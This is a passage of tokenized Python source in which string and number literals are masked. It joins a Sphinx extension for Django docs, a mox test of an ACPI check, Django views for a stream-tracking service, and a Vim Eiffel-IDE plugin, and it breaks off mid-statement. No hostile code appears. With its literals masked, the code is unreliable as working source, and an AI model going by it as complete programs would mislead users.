depart_literal_block ( self , node ) <EOL> self . no_smarty -= <NUM_LIT:1> <EOL> version_text = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> def visit_versionmodified ( self , node ) : <EOL> self . body . append ( <EOL> self . starttag ( node , '<STR_LIT>' , CLASS = node [ '<STR_LIT:type>' ] ) <EOL> ) <EOL> title = "<STR_LIT>" % ( <EOL> self . version_text [ node [ '<STR_LIT:type>' ] ] % node [ '<STR_LIT:version>' ] , <EOL> len ( node ) and "<STR_LIT::>" or "<STR_LIT:.>" <EOL> ) <EOL> self . body . append ( '<STR_LIT>' % title ) <EOL> def depart_versionmodified ( self , node ) : <EOL> self . body . append ( "<STR_LIT>" ) <EOL> def visit_section ( self , node ) : <EOL> old_ids = node . get ( '<STR_LIT>' , [ ] ) <EOL> node [ '<STR_LIT>' ] = [ '<STR_LIT>' + i for i in old_ids ] <EOL> node [ '<STR_LIT>' ] . extend ( old_ids ) <EOL> SmartyPantsHTMLTranslator . visit_section ( self , node ) <EOL> node [ '<STR_LIT>' ] = old_ids <EOL> def parse_django_admin_node ( env , sig , signode ) : <EOL> command = sig . split ( '<STR_LIT:U+0020>' ) [ <NUM_LIT:0> ] <EOL> env . _django_curr_admin_command = command <EOL> title = "<STR_LIT>" % sig <EOL> signode += addnodes . desc_name ( title , title ) <EOL> return sig <EOL> def parse_django_adminopt_node ( env , sig , signode ) : <EOL> """<STR_LIT>""" <EOL> from sphinx . domains . std import option_desc_re <EOL> count = <NUM_LIT:0> <EOL> firstname = '<STR_LIT>' <EOL> for m in option_desc_re . finditer ( sig ) : <EOL> optname , args = m . groups ( ) <EOL> if count : <EOL> signode += addnodes . desc_addname ( '<STR_LIT:U+002CU+0020>' , '<STR_LIT:U+002CU+0020>' ) <EOL> signode += addnodes . desc_name ( optname , optname ) <EOL> signode += addnodes . desc_addname ( args , args ) <EOL> if not count : <EOL> firstname = optname <EOL> count += <NUM_LIT:1> <EOL> if not count : <EOL> for m in simple_option_desc_re . finditer ( sig ) : <EOL> optname , args = m . groups ( ) <EOL> if count : <EOL> signode += addnodes . desc_addname ( '<STR_LIT:U+002CU+0020>' , '<STR_LIT:U+002CU+0020>' ) <EOL> signode += addnodes . desc_name ( optname , optname ) <EOL> signode += addnodes . desc_addname ( args , args ) <EOL> if not count : <EOL> firstname = optname <EOL> count += <NUM_LIT:1> <EOL> if not firstname : <EOL> raise ValueError <EOL> return firstname <EOL> class DjangoStandaloneHTMLBuilder ( StandaloneHTMLBuilder ) : <EOL> """<STR_LIT>""" <EOL> name = '<STR_LIT>' <EOL> def finish ( self ) : <EOL> super ( DjangoStandaloneHTMLBuilder , self ) . finish ( ) <EOL> self . info ( bold ( "<STR_LIT>" ) ) <EOL> xrefs = self . env . domaindata [ "<STR_LIT>" ] [ "<STR_LIT>" ] <EOL> templatebuiltins = { <EOL> "<STR_LIT>" : [ n for ( ( t , n ) , ( l , a ) ) in xrefs . items ( ) <EOL> if t == "<STR_LIT>" and l == "<STR_LIT>" ] , <EOL> "<STR_LIT>" : [ n for ( ( t , n ) , ( l , a ) ) in xrefs . items ( ) <EOL> if t == "<STR_LIT>" and l == "<STR_LIT>" ] , <EOL> } <EOL> outfilename = os . path . join ( self . outdir , "<STR_LIT>" ) <EOL> with open ( outfilename , '<STR_LIT:wb>' ) as fp : <EOL> fp . write ( '<STR_LIT>' ) <EOL> json . dump ( templatebuiltins , fp ) <EOL> fp . write ( '<STR_LIT>' ) </s>
<s> import cStringIO as StringIO <EOL> import subprocess <EOL> import unittest <EOL> import mox <EOL> import portable_platform <EOL> def subprocess_mock ( mox , * args , ** kw ) : <EOL> mock_process = mox . CreateMock ( subprocess . Popen ) <EOL> mox . StubOutWithMock ( subprocess , '<STR_LIT>' , use_mock_anything = True ) <EOL> subprocess . Popen ( * args , ** kw ) . AndReturn ( <EOL> mock_process ) <EOL> return mock_process <EOL> class ACStatusTest ( mox . MoxTestBase ) : <EOL> acpi_online = """<STR_LIT>""" <EOL> acpi_offline = """<STR_LIT>""" <EOL> def test_offline ( self ) : <EOL> mock_process = subprocess_mock ( self . mox , '<STR_LIT>' , shell = True , stdout = subprocess . PIPE ) <EOL> mock_process . stdout = StringIO . StringIO ( self . acpi_offline ) <EOL> mock_process . communicate ( None ) . AndReturn ( ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> mock_process . returncode = <NUM_LIT:0> <EOL> self . mox . ReplayAll ( ) <EOL> self . assertFalse ( portable_platform . get_ac_status ( ) ) <EOL> def test_online ( self ) : <EOL> mock_process = subprocess_mock ( self . mox , '<STR_LIT>' , shell = True , stdout = subprocess . PIPE ) <EOL> mock_process . stdout = StringIO . StringIO ( self . acpi_online ) <EOL> mock_process . communicate ( None ) . AndReturn ( ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> mock_process . returncode = <NUM_LIT:0> <EOL> self . mox . ReplayAll ( ) <EOL> self . assertTrue ( portable_platform . get_ac_status ( ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> import collections <EOL> import datetime <EOL> import fcntl <EOL> import hashlib <EOL> import json <EOL> import os <EOL> import random <EOL> import string <EOL> import sys <EOL> import time <EOL> import traceback <EOL> from django import http <EOL> from django . conf import settings <EOL> from django . db import transaction <EOL> from django . shortcuts import render <EOL> from django . views . decorators . cache import never_cache <EOL> from django . views . decorators . csrf import csrf_exempt <EOL> from django import template <EOL> from common . views import NeverCacheRedirectView <EOL> from tracker import models <EOL> config_path = os . path . realpath ( os . path . dirname ( __file__ ) + "<STR_LIT>" ) <EOL> if config_path not in sys . path : <EOL> sys . path . append ( config_path ) <EOL> import config as common_config <EOL> CONFIG = common_config . config_load ( ) <EOL> LOCALIPS = CONFIG [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> class funnydict ( dict ) : <EOL> def __getattr__ ( self , key ) : <EOL> return self [ key ] <EOL> @ never_cache <EOL> def stream ( request , group ) : <EOL> """<STR_LIT>""" <EOL> if not CONFIG . valid ( group ) : <EOL> response = http . HttpResponse ( ) <EOL> response . write ( "<STR_LIT>" ) <EOL> return response <EOL> active_servers = models . Endpoint . active ( group = group ) <EOL> if active_servers : <EOL> your_server = sorted ( active_servers , key = lambda x : x . overall_bitrate ) [ <NUM_LIT:0> ] <EOL> else : <EOL> your_server = None <EOL> return render ( request , '<STR_LIT>' , locals ( ) , content_type = '<STR_LIT>' , <EOL> context_instance = template . RequestContext ( request ) ) <EOL> @ never_cache <EOL> def streams ( request ) : <EOL> """<STR_LIT>""" <EOL> active_servers = models . Endpoint . active ( ) <EOL> return render ( request , '<STR_LIT>' , locals ( ) , content_type = '<STR_LIT>' , <EOL> context_instance = template . RequestContext ( request ) ) <EOL> @ never_cache <EOL> def endpoint_stats ( request ) : <EOL> """<STR_LIT>""" <EOL> response = http . HttpResponse ( ) <EOL> inactive_servers = [ ] <EOL> active_servers = [ ] <EOL> ten_mins_ago = datetime . datetime . now ( ) - datetime . timedelta ( minutes = <NUM_LIT:10> ) <EOL> endpoints = models . Endpoint . active ( delta = datetime . timedelta ( days = <NUM_LIT:7> ) ) <EOL> for server in endpoints : <EOL> if server . lastseen < ten_mins_ago : <EOL> inactive_servers . append ( server ) <EOL> else : <EOL> active_servers . append ( server ) <EOL> types = list ( sorted ( [ x for x in dir ( models . Endpoint ( ) ) if x . endswith ( '<STR_LIT>' ) ] ) ) <EOL> all_types = list ( sorted ( [ x for x in dir ( models . Endpoint ( ) ) if not x . startswith ( '<STR_LIT:_>' ) ] ) ) <EOL> active_servers = sorted ( active_servers , key = lambda x : ( x . group , x . overall_bitrate ) ) <EOL> active_overall = funnydict ( ( t , sum ( [ <NUM_LIT:0> , getattr ( x , t , None ) ] [ isinstance ( getattr ( x , t , None ) , ( int , float ) ) ] for x in active_servers ) ) for t in all_types ) <EOL> inactive_servers = sorted ( inactive_servers , key = lambda x : ( x . group , x . overall_bitrate ) ) <EOL> inactive_overall = funnydict ( ( t , sum ( [ <NUM_LIT:0> , getattr ( x , t , None ) ] [ isinstance ( getattr ( x , t , None ) , ( int , float ) ) ] for x in inactive_servers ) ) for t in all_types ) <EOL> return render ( request , '<STR_LIT>' , locals ( ) , content_type = '<STR_LIT>' , <EOL> context_instance = template . RequestContext ( request ) ) <EOL> def overall_stats_json ( request ) : <EOL> """<STR_LIT>""" <EOL> graphs = [ ] <EOL> annotations = [ ] <EOL> DEFAULT_RANGE = <NUM_LIT> <EOL> view_range = request . GET . get ( '<STR_LIT>' , DEFAULT_RANGE ) <EOL> try : <EOL> view_range = int ( view_range ) <EOL> except ValueError : <EOL> view_range = DEFAULT_RANGE <EOL> range_start_datetime = datetime . datetime . now ( ) - datetime . timedelta ( minutes = view_range ) <EOL> bitrate_graph = { <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : [ ] , <EOL> } <EOL> client_graph = { <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : [ ] , <EOL> } <EOL> recent_endpoints = models . Endpoint . objects . filter ( <EOL> lastseen__gte = range_start_datetime , <EOL> lastseen__lte = datetime . datetime . now ( ) <EOL> ) . order_by ( '<STR_LIT>' ) <EOL> endpoints_by_group = { } <EOL> raw_attrs = ( '<STR_LIT>' , '<STR_LIT>' , ) <EOL> for endpoint in recent_endpoints : <EOL> if endpoint . group not in endpoints_by_group : <EOL> endpoints_by_group [ endpoint . group ] = [ ] <EOL> endpoint_data = { <EOL> '<STR_LIT>' : int ( endpoint . lastseen . strftime ( '<STR_LIT:%s>' ) ) * <NUM_LIT:1000> , <EOL> } <EOL> for attr in raw_attrs : <EOL> endpoint_data [ attr ] = getattr ( endpoint , attr ) <EOL> endpoints_by_group [ endpoint . group ] . append ( endpoint_data ) <EOL> for group , endpoints in endpoints_by_group . items ( ) : <EOL> bitrate_data = [ ] <EOL> client_data = [ ] <EOL> for point in endpoints : <EOL> bitrate_data . append ( [ point [ '<STR_LIT>' ] , point [ '<STR_LIT>' ] / ( <NUM_LIT> ) ] ) <EOL> client_data . append ( [ point [ '<STR_LIT>' ] , point [ '<STR_LIT>' ] ] ) <EOL> bitrate_graph [ '<STR_LIT>' ] . append ( { <EOL> '<STR_LIT:label>' : group , <EOL> '<STR_LIT:data>' : bitrate_data , <EOL> } ) <EOL> client_graph [ '<STR_LIT>' ] . append ( { <EOL> '<STR_LIT:label>' : group , <EOL> '<STR_LIT:data>' : client_data , <EOL> } ) <EOL> graphs . append ( bitrate_graph ) <EOL> graphs . append ( client_graph ) <EOL> response = http . HttpResponse ( content_type = '<STR_LIT:application/json>' ) <EOL> response . write ( json . dumps ( { <EOL> '<STR_LIT>' : graphs , <EOL> '<STR_LIT>' : annotations , <EOL> } ) ) <EOL> return response <EOL> def generate_salt ( ) : <EOL> """<STR_LIT>""" <EOL> return "<STR_LIT>" . join ( random . choice ( string . ascii_letters ) for x in range ( <NUM_LIT:16> ) ) <EOL> def user_key ( request , salt = None ) : <EOL> """<STR_LIT>""" <EOL> if salt is None : <EOL> salt = generate_salt ( ) <EOL> in_data = [ salt ] <EOL> in_data . append ( request . META [ '<STR_LIT>' ] ) <EOL> in_data . append ( request . META [ settings . HTTP_REMOTE_ADDR_META ] ) <EOL> return '<STR_LIT>' % ( salt , hashlib . sha224 ( "<STR_LIT>" . join ( in_data ) ) . hexdigest ( ) ) <EOL> class error ( object ) : <EOL> """<STR_LIT>""" <EOL> SUCCESS = <NUM_LIT:0> <EOL> ERROR_GROUP = <NUM_LIT:1> <EOL> ERROR_JSON = <NUM_LIT:2> <EOL> WARNING_COOKIE = <NUM_LIT> <EOL> def client_common ( request , group ) : <EOL> """<STR_LIT>""" <EOL> if request . method != '<STR_LIT:POST>' : <EOL> return NeverCacheRedirectView . as_view ( url = "<STR_LIT:/>" ) ( request ) <EOL> response = http . HttpResponse ( content_type = '<STR_LIT>' ) <EOL> if not CONFIG . valid ( group ) : <EOL> response . write ( json . dumps ( { <EOL> '<STR_LIT:code>' : error . ERROR_GROUP , <EOL> '<STR_LIT:error>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : - <NUM_LIT:1> , <EOL> } ) ) <EOL> return ( response , None , None ) <EOL> if '<STR_LIT:user>' not in request . COOKIES : <EOL> response . set_cookie ( '<STR_LIT:user>' , value = user_key ( request ) ) <EOL> response . write ( json . dumps ( { <EOL> '<STR_LIT:code>' : error . WARNING_COOKIE , <EOL> '<STR_LIT:error>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> } ) ) <EOL> return ( response , None , None ) <EOL> salt , digest = request . COOKIES [ '<STR_LIT:user>' ] . split ( '<STR_LIT::>' ) <EOL> if user_key ( request , salt ) != request . COOKIES [ '<STR_LIT:user>' ] : <EOL> response . delete_cookie ( '<STR_LIT:user>' ) <EOL> response . write ( json . dumps ( { <EOL> '<STR_LIT:code>' : error . WARNING_COOKIE , <EOL> '<STR_LIT:error>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> } ) ) <EOL> return ( response , None , None ) <EOL> return ( None , group , request . COOKIES [ '<STR_LIT:user>' ] ) <EOL> @ csrf_exempt <EOL> @ never_cache <EOL> @ transaction . atomic <EOL> def client_stats ( request , group , _now = None ) : <EOL> """<STR_LIT>""" <EOL> response , group , user = client_common ( request , group ) <EOL> if response is not None : <EOL> return response <EOL> try : <EOL> data = json . loads ( request . POST . get ( '<STR_LIT:data>' , "<STR_LIT:{}>" ) ) <EOL> except ValueError , e : <EOL> response = http . HttpResponse ( content_type = '<STR_LIT>' ) <EOL> response . write ( json . dumps ( { <EOL> '<STR_LIT:code>' : error . ERROR_JSON , <EOL> '<STR_LIT:error>' : '<STR_LIT>' % e , <EOL> '<STR_LIT>' : - <NUM_LIT:1> , <EOL> } ) ) <EOL> return response <EOL> data [ '<STR_LIT>' ] = request . META [ '<STR_LIT>' ] <EOL> data [ '<STR_LIT>' ] = request . META [ settings . HTTP_REMOTE_ADDR_META ] <EOL> if '<STR_LIT>' in request . META : <EOL> data [ '<STR_LIT>' ] = request . META [ '<STR_LIT>' ] <EOL> s = models . ClientStats ( <EOL> group = group , <EOL> created_by = user ) <EOL> if _now is not None : <EOL> s . created_on = _now <EOL> s . save ( ) <EOL> s . from_dict ( data ) <EOL> response = http . HttpResponse ( content_type = '<STR_LIT>' ) <EOL> response . write ( json . dumps ( { <EOL> '<STR_LIT:code>' : error . SUCCESS , <EOL> '<STR_LIT>' : <NUM_LIT:5> , <EOL> } ) ) <EOL> return response <EOL> def endpoint_common ( request , check_group = True ) : <EOL> """<STR_LIT>""" <EOL> if request . method != '<STR_LIT:POST>' : <EOL> return NeverCacheRedirectView . as_view ( url = "<STR_LIT:/>" ) ( request ) <EOL> response = http . HttpResponse ( content_type = '<STR_LIT>' ) <EOL> if not CONFIG [ '<STR_LIT>' ] . get ( '<STR_LIT>' , None ) : <EOL> response . write ( '<STR_LIT>' ) <EOL> return response , None , None <EOL> secret = request . POST . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if secret != CONFIG [ '<STR_LIT>' ] [ '<STR_LIT>' ] : <EOL> response . write ( '<STR_LIT>' ) <EOL> return response , None , None <EOL> if check_group : <EOL> group = request . POST . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if not CONFIG . valid ( group ) : <EOL> response . write ( '<STR_LIT>' ) <EOL> return response , None , None <EOL> else : <EOL> group = None <EOL> ip = request . META [ settings . HTTP_REMOTE_ADDR_META ] <EOL> return None , group , ip <EOL> @ csrf_exempt <EOL> @ never_cache <EOL> @ transaction . atomic <EOL> def endpoint_register ( request ) : <EOL> """<STR_LIT>""" <EOL> response , group , ip = endpoint_common ( request ) <EOL> if response is not None : <EOL> return response <EOL> try : <EOL> data = json . loads ( request . POST . get ( '<STR_LIT:data>' , '<STR_LIT:{}>' ) ) <EOL> assert '<STR_LIT>' not in data <EOL> assert '<STR_LIT>' not in data <EOL> s = models . Endpoint ( group = group , ip = ip , ** data ) <EOL> s . save ( ) <EOL> response = http . HttpResponse ( content_type = '<STR_LIT>' ) <EOL> response . write ( '<STR_LIT>' ) <EOL> return response <EOL> except Exception , e : <EOL> response = http . HttpResponse ( content_type = '<STR_LIT>' ) <EOL> response . write ( '<STR_LIT>' % e . __class__ . __name__ ) <EOL> traceback . print_exc ( file = response ) <EOL> return response <EOL> @ csrf_exempt <EOL> @ never_cache <EOL> def endpoint_logs ( request ) : <EOL> """<STR_LIT>""" <EOL> response , group , ip = endpoint_common ( request ) <EOL> if response is not None : <EOL> return response <EOL> while True : <EOL> logfile = file ( os . path . join ( CONFIG [ '<STR_LIT>' ] [ '<STR_LIT>' ] , "<STR_LIT>" % ( group , ip ) ) , '<STR_LIT:a>' ) <EOL> try : <EOL> fcntl . lockf ( logfile , fcntl . LOCK_EX | fcntl . LOCK_NB ) <EOL> except IOError : <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> else : <EOL> break <EOL> logfile . write ( request . POST [ '<STR_LIT:data>' ] ) <EOL> logfile . flush ( ) <EOL> fcntl . lockf ( logfile , fcntl . LOCK_UN ) <EOL> logfile . close ( ) <EOL> response = http . HttpResponse ( content_type = '<STR_LIT>' ) <EOL> response . write ( '<STR_LIT>' ) <EOL> return response <EOL> @ csrf_exempt <EOL> @ never_cache <EOL> def flumotion_logging ( request ) : <EOL> """<STR_LIT>""" <EOL> response , group , ip = endpoint_common ( request , check_group = False ) <EOL> if response is not None : <EOL> return response <EOL> try : <EOL> data = json . loads ( request . POST . get ( '<STR_LIT:data>' , "<STR_LIT:{}>" ) ) <EOL> except ValueError , e : <EOL> response = http . HttpResponse ( content_type = '<STR_LIT>' ) <EOL> response . write ( '<STR_LIT>' % e ) <EOL> return response <EOL> s = models . Flumotion ( <EOL> identifier = request . POST [ '<STR_LIT>' ] , <EOL> recorded_time = request . POST [ '<STR_LIT>' ] , <EOL> type = request . POST . get ( '<STR_LIT:type>' , '<STR_LIT>' ) , <EOL> ip = request . META [ settings . HTTP_REMOTE_ADDR_META ] , <EOL> data = json . dumps ( data ) , <EOL> ) <EOL> s . save ( ) <EOL> response = http . HttpResponse ( content_type = '<STR_LIT>' ) <EOL> response . write ( '<STR_LIT>' ) <EOL> return response <EOL> @ never_cache <EOL> def flumotion_stats ( request ) : <EOL> ten_mins_ago = datetime . datetime . now ( ) - datetime . timedelta ( minutes = <NUM_LIT:10> ) <EOL> flumotion = models . Flumotion . objects . order_by ( <EOL> '<STR_LIT:type>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> ) . filter ( lastseen__gte = ten_mins_ago ) <EOL> [ ( x . identifier , x . lastseen , x . type ) for x in flumotion ] <EOL> types = set ( ) <EOL> keys = { } <EOL> active_servers = collections . OrderedDict ( ) <EOL> for server in flumotion : <EOL> types . add ( server . type ) <EOL> if server . type not in keys : <EOL> keys [ server . type ] = set ( ) <EOL> key = '<STR_LIT>' % ( server . identifier , server . ip ) <EOL> server . full_data = json . loads ( server . data ) <EOL> for k in server . full_data [ '<STR_LIT>' ] . keys ( ) : <EOL> keys [ server . type ] . add ( k ) <EOL> if key not in active_servers : <EOL> active_servers [ key ] = server <EOL> else : <EOL> newest = active_servers [ key ] <EOL> for k in newest . full_data [ '<STR_LIT>' ] . keys ( ) : <EOL> if k not in server . full_data [ '<STR_LIT>' ] : <EOL> continue <EOL> active_servers [ key ] . full_data [ '<STR_LIT>' ] [ k ] . append ( ( <EOL> server . full_data [ '<STR_LIT>' ] [ k ] [ <NUM_LIT:0> ] , <EOL> - <NUM_LIT:1> , <EOL> server . full_data [ '<STR_LIT>' ] [ k ] [ - <NUM_LIT:1> ] , <EOL> ) ) <EOL> newest . full_data [ '<STR_LIT>' ] [ k ] += server . full_data [ '<STR_LIT>' ] [ k ] <EOL> filtered_history = [ ( '<STR_LIT>' , <NUM_LIT:0> , '<STR_LIT>' ) ] <EOL> for history in reversed ( newest . full_data [ '<STR_LIT>' ] [ k ] ) : <EOL> if filtered_history [ - <NUM_LIT:1> ] [ <NUM_LIT:0> ] != history [ <NUM_LIT:0> ] : <EOL> filtered_history . append ( history ) <EOL> newest . full_data [ '<STR_LIT>' ] [ k ] = list ( reversed ( filtered_history [ <NUM_LIT:1> : ] ) ) <EOL> for k in keys : <EOL> keys [ k ] = list ( sorted ( keys [ k ] ) ) <EOL> return render ( request , '<STR_LIT>' , locals ( ) , content_type = '<STR_LIT>' , <EOL> context_instance = template . RequestContext ( request ) ) </s>
<s> import environment_vim as environment <EOL> import eiffel_ide <EOL> import string <EOL> def get_class_from_buffer ( a_project ) : <EOL> """<STR_LIT>""" <EOL> if environment . evaluate ( "<STR_LIT>" ) == environment . get_global_variable ( "<STR_LIT>" ) : <EOL> try : <EOL> l_class = environment . get_buffer_variable ( "<STR_LIT>" ) <EOL> except : <EOL> l_class = "<STR_LIT>" <EOL> else : <EOL> l_buffer_text = environment . buffer_to_text ( ) <EOL> l_class = a_project . class_name_from_text ( l_buffer_text ) <EOL> return l_class <EOL> def set_class_and_info ( a_info_name , a_class_name ) : <EOL> """<STR_LIT>""" <EOL> environment . set_buffer_variable ( "<STR_LIT>" , <EOL> a_info_name ) <EOL> environment . set_buffer_variable ( "<STR_LIT>" , <EOL> a_class_name ) <EOL> def unset_class_and_info ( ) : <EOL> """<STR_LIT>""" <EOL> environment . set_buffer_variable ( "<STR_LIT>" , None ) <EOL> environment . set_buffer_variable ( "<STR_LIT>" , None ) <EOL> def class_execute ( a_project , a_name , a_routine , a_class_name = None ) : <EOL> """<STR_LIT>""" <EOL> if a_class_name : <EOL> l_class = a_class_name <EOL> if l_class == "<STR_LIT:%>" : <EOL> l_class = get_class_from_buffer ( a_project ) <EOL> else : <EOL> l_class = environment . word_under_the_cursor ( ) <EOL> if not l_class : <EOL> l_class = get_class_from_buffer ( a_project ) <EOL> if l_class : <EOL> eiffel_ide . launch_process ( a_project , <EOL> lambda window : a_routine ( l_class , window ) , <EOL> "<STR_LIT>" + a_name . lower ( ) + "<STR_LIT>" + <EOL> l_class , a_name + "<STR_LIT>" + l_class , <EOL> False , True , <EOL> lambda : set_class_and_info ( a_name , l_class ) ) <EOL> environment . execute ( "<STR_LIT>" ) <EOL> def flat ( a_project , * arguments ) : <EOL> """<STR_LIT>""" <EOL> l_class_name = None <EOL> if arguments : <EOL> l_class_name = arguments [ <NUM_LIT:0> ] <EOL> class_execute ( a_project , "<STR_LIT>" , <EOL> lambda a_class , a_buffer : <EOL> a_project . fetch_class_flat ( a_class , a_buffer ) , <EOL> l_class_name ) <EOL> environment . eiffel_fold ( ) <EOL> def ancestors ( a_project , * arguments ) : <EOL> """<STR_LIT>""" <EOL> l_class_name = None <EOL> if arguments : <EOL> l_class_name = arguments [ <NUM_LIT:0> ] <EOL> class_execute ( a_project , "<STR_LIT>" , <EOL> lambda a_class , a_buffer : <EOL> a_project . fetch_class_ancestors ( a_class , a_buffer ) , <EOL> l_class_name ) <EOL> def attributes ( a_project , * arguments ) : <EOL> """<STR_LIT>""" <EOL> l_class_name = None <EOL> if arguments : <EOL> l_class_name = arguments [ <NUM_LIT:0> ] <EOL> class_execute ( a_project , "<STR_LIT>" , <EOL> lambda a_class , a_buffer : <EOL> a_project . fetch_class_attributes ( a_class , a_buffer ) , <EOL> l_class_name ) <EOL> def clients ( a_project , * arguments ) : <EOL> """<STR_LIT>""" <EOL> l_class_name = None <EOL> if arguments : <EOL> l_class_name = arguments [ <NUM_LIT:0> ] <EOL> class_execute ( a_project , "<STR_LIT>" , <EOL> lambda a_class , a_buffer : <EOL> a_project . fetch_class_clients ( a_class , a_buffer ) , <EOL> l_class_name ) <EOL> def deferred ( a_project , * arguments ) : <EOL> """<STR_LIT>""" <EOL> l_class_name = None <EOL> if arguments : <EOL> l_class_name = arguments [ <NUM_LIT:0> ] <EOL> class_execute ( a_project , "<STR_LIT>" , <EOL> lambda a_class , a_buffer : <EOL> a_project . fetch_class_deferred ( a_class , a_buffer ) , <EOL> l_class_name ) <EOL> def descendants ( a_project , * arguments ) : <EOL> """<STR_LIT>""" <EOL> l_class_name = None <EOL> if arguments : <EOL> l_class_name = arguments [ <NUM_LIT:0> ] <EOL> class_execute ( a_project , "<STR_LIT>" , <EOL> lambda a_class , a_buffer : <EOL> a_project . fetch_class_descendants ( a_class , a_buffer ) , <EOL> l_class_name ) <EOL> def exported ( a_project , * arguments ) : <EOL> """<STR_LIT>""" <EOL> l_class_name = None <EOL> if arguments : <EOL> l_class_name = arguments [ <NUM_LIT:0> ] <EOL> class_execute ( a_project , "<STR_LIT>" , <EOL> lambda a_class , a_buffer : <EOL> a_project . fetch_class_exported ( a_class , a_buffer ) , <EOL> l_class_name ) <EOL> def externals ( a_project , * arguments ) : <EOL> """<STR_LIT>""" <EOL> l_class_name = None <EOL> if arguments : <EOL> l_class_name = arguments [ <NUM_LIT:0> ] <EOL> class_execute ( a_project , "<STR_LIT>" , <EOL> lambda a_class , a_buffer : <EOL> a_project . fetch_class_externals ( a_class , a_buffer ) , <EOL> l_class_name ) <EOL> def flatshort ( a_project , * arguments ) : <EOL> """<STR_LIT>""" <EOL> l_class_name = None <EOL> if arguments : <EOL> l_class_name = arguments [ <NUM_LIT:0> ] <EOL> class_execute ( a_project , "<STR_LIT>" , <EOL> lambda a_class , a_buffer : <EOL> a_project . fetch_class_flatshort ( a_class , a_buffer ) , <EOL> l_class_name ) <EOL> environment . eiffel_fold ( ) <EOL> def once ( a_project , * arguments ) : <EOL> """<STR_LIT>""" <EOL> l_class_name = None <EOL> if arguments : <EOL> l_class_name = arguments [ <NUM_LIT:0> ] <EOL> class_execute ( a_project , "<STR_LIT>" , <EOL> lambda a_class , a_buffer : <EOL> a_project . fetch_class_once ( a_class , a_buffer ) , <EOL> l_class_name ) <EOL> def invariants ( a_project , * arguments ) : <EOL> """<STR_LIT>""" <EOL> l_class_name = None <EOL> if arguments : <EOL> l_class_name = arguments [ <NUM_LIT:0> ] <EOL> class_execute ( a_project , "<STR_LIT>" , <EOL> lambda a_class , a_buffer : <EOL> a_project . fetch_class_invariants ( a_class , a_buffer ) , <EOL> l_class_name ) <EOL> def routines ( a_project , * arguments ) : <EOL> """<STR_LIT>""" <EOL> l_class_name = None <EOL> if arguments : <EOL> l_class_name = arguments [ <NUM_LIT:0> ] <EOL> class_execute ( a_project , "<STR_LIT>" , <EOL> lambda a_class , a_buffer : <EOL> a_project . fetch_class_routines ( a_class , a_buffer ) , <EOL> l_class_name ) <EOL> def creators ( a_project , * arguments ) : <EOL> """<STR_LIT>""" <EOL> l_class_name = None <EOL> if arguments : <EOL> l_class_name = arguments [ <NUM_LIT:0> ] <EOL> class_execute ( a_project , "<STR_LIT>" , <EOL> lambda a_class , a_buffer : <EOL> a_project . fetch_class_creators ( a_class , a_buffer ) , <EOL> l_class_name ) <EOL> def short ( a_project , * arguments ) : <EOL> """<STR_LIT>""" <EOL> l_class_name = None <EOL> if arguments : <EOL> l_class_name = arguments [ <NUM_LIT:0> ] <EOL> class_execute ( a_project , "<STR_LIT>" , <EOL> lambda a_class , a_buffer : <EOL> a_project . fetch_class_short ( a_class , a_buffer ) , <EOL> l_class_name ) <EOL> environment . eiffel_fold ( ) <EOL> def suppliers ( a_project , * arguments ) : <EOL> """<STR_LIT>""" <EOL> l_class_name = None <EOL> if arguments : <EOL> l_class_name = arguments [ <NUM_LIT:0> ] <EOL> class_execute ( a_project , "<STR_LIT>" , <EOL> lambda a_class , a_buffer : <EOL> a_project . fetch_class_suppliers ( a_class , a_buffer ) , <EOL> l_class_name ) <EOL> def text ( a_project , * arguments ) : <EOL> """<STR_LIT>""" <EOL> l_class_name = None <EOL> if arguments : <EOL> l_class_name = arguments [ <NUM_LIT:0> ] <EOL> class_execute ( a_project , "<STR_LIT>" , <EOL> lambda a_class , a_buffer : <EOL> a_project . fetch_class_text ( a_class , a_buffer ) , <EOL> l_class_name ) <EOL> environment . eiffel_fold ( ) <EOL> def _edit_command_and_flag ( is_split , is_vertical , is_tab , force_edit ) : <EOL> """<STR_LIT>""" <EOL> flags = "<STR_LIT>" <EOL> if is_split : <EOL> command = "<STR_LIT>" <EOL> if is_vertical : <EOL> flags = "<STR_LIT>" <EOL> elif is_tab : <EOL> command = "<STR_LIT>" <EOL> else : <EOL> command = "<STR_LIT>" <EOL> if force_edit : <EOL> command = command + "<STR_LIT:!>" <EOL> return ( command , flags ) <EOL> def edit ( a_project , is_split = False , is_vertical = False , is_tab = False , <EOL> force_edit = False , * argument ) : <EOL> """<STR_LIT>""" <EOL> has_error = False <EOL> if argument : <EOL> class_name = argument [ <NUM_LIT:0> ] <EOL> else : <EOL> class_name = environment . word_under_the_cursor ( ) <EOL> if class_name : <EOL> class_path = a_project . file_path_from_class_name ( class_name ) <EOL> else : <EOL> class_path = None <EOL> if class_path : <EOL> ( command , flags ) = _edit_command_and_flag ( is_split , is_vertical , <EOL> is_tab , force_edit ) <EOL> if not is_split and not is_tab and not force_edit : <EOL> if int ( environment . get_option ( "<STR_LIT>" ) ) : <EOL> print ( "<STR_LIT>" ) <EOL> has_error = True <EOL> if not has_error : <EOL> environment . execute ( flags + "<STR_LIT:U+0020>" + command + "<STR_LIT:U+0020>" + class_path ) <EOL> def complete_start ( ) : <EOL> """<STR_LIT>""" <EOL> result = - <NUM_LIT:3> <EOL> col = environment . get_cursor_column ( ) <EOL> row = environment . get_cursor_row ( ) <EOL> if col != <NUM_LIT:0> : <EOL> start = environment . start_column_of_word ( row , 